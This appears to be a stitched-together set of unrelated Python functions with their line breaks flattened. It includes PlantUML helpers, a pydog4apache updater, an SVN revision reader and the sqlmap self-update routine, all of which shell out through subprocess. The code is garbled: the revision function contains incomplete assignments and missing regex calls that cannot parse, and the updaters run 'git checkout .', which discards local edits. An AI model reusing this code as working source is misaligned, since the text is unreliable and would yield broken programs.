def check_plantuml_version(self): puml = execute( ["java", "-jar", self.plantuml_jar_path, "-version"], stdout=PIPE, stderr=STDOUT, **EXTRA_CALL_ARGS ) (stdout, stderr) = puml.communicate() version_output = stdout print("Version Detection:") print(version_output) if not puml.returncode == 0: raise Exception("PlantUML returned an error code") if self.PLANTUML_VERSION_STRING not in str(version_output): raise Exception("error verifying PlantUML version")
def __init__(self): GIT_REPOSITORY = "" rootDir = os.path.abspath(os.path.join(os.path.dirname( __file__ ), '..', '')) if not os.path.exists(os.path.join(rootDir, ".git")): print "Not any .git repository found!\n" print "="*30 print "\nTo have working this feature, you should clone pydog4apache with:\n" print "$ git clone %s" % GIT_REPOSITORY else: checkout = execute("git checkout . && git pull", shell=True, stdout=PIPE, stderr=PIPE).communicate()[0] print checkout if not "Already up-to-date" in checkout: print "Congratulations!! pydog4apache has been updated... ;-)\n" else: print "Your pydog4apache doesn't need to be updated... ;-)\n"
def getRevisionNumber(): curDir = os.path.dirname(os.path.realpath(__file__)) retVal = None try: import pysvn client = pysvn.Client() if retVal = except ImportError: process = execute("svn info %s" % curDir, shell=True, stdout=PIPE, stderr=PIPE) svnStdout, svnStderr = process.communicate() if svnStdout: revision ="Revision:\s+([\d]+)", svnStdout) if revision: retVal = except: pass if not retVal: # Reference: entriesPath = '%s/.svn/entries' % curDir if os.path.exists(entriesPath): entries = open(entriesPath, 'r').read() # Versions >= 7 of the entries file are flat text. The first line is # the version number. The next set of digits after 'dir' is the revision. if re.match('(\d+)', entries): match ='\d+\s+dir\s+(\d+)', entries) if match: retVal = match.groups()[0] # Older XML versions of the file specify revision as an attribute of # the first entries node. else: from xml.dom import minidom dom = minidom.parse(entriesPath) retVal = dom.getElementsByTagName('entry')[0].getAttribute('revision') if retVal: try: retVal = int(retVal) except ValueError: retVal = None return retVal
def update(): if not conf.updateAll: return success = False if not os.path.exists(os.path.join(paths.SQLMAP_ROOT_PATH, ".git")): errMsg = "not a git repository. Please checkout the 'sqlmapproject/sqlmap' repository " errMsg += "from GitHub (e.g. 'git clone sqlmap')" logger.error(errMsg) else: infoMsg = "updating sqlmap to the latest development version from the " infoMsg += "GitHub repository" debugMsg = "sqlmap will try to update itself using 'git' command" logger.debug(debugMsg) dataToStdout("\r[%s] [INFO] update in progress " % time.strftime("%X")) try: process = execute( "git checkout . && git pull %s HEAD" % GIT_REPOSITORY, shell=True, stdout=PIPE, stderr=PIPE, cwd=paths.SQLMAP_ROOT_PATH) pollProcess(process, True) stdout, stderr = process.communicate() success = not process.returncode except (IOError, OSError), ex: success = False stderr = getSafeExString(ex) if success: import lib.core.settings _ = lib.core.settings.REVISION = getRevisionNumber() "%s the latest revision '%s'" % ("already at" if "Already" in stdout else "updated to", _)) else: if "Not a git repository" in stderr: errMsg = "not a valid git repository. Please checkout the 'sqlmapproject/sqlmap' repository " errMsg += "from GitHub (e.g. 'git clone sqlmap')" logger.error(errMsg) else: logger.error("update could not be completed ('%s')" % re.sub( r"\W+", " ", stderr).strip())
def generate(self): command = ["java", "-jar", self.proc.plantuml_jar_path, "-pipe", "-tpng", "-charset", "UTF-8"] charset = self.proc.CHARSET if charset: print("using charset: " + charset) command.append("-charset") command.append(charset) puml = execute(command, stdin=PIPE, stdout=self.file, **EXTRA_CALL_ARGS) puml.communicate(input=self.text.encode("UTF-8")) if puml.returncode != 0: print("Error Processing Diagram:") print(self.text) return else: return self.file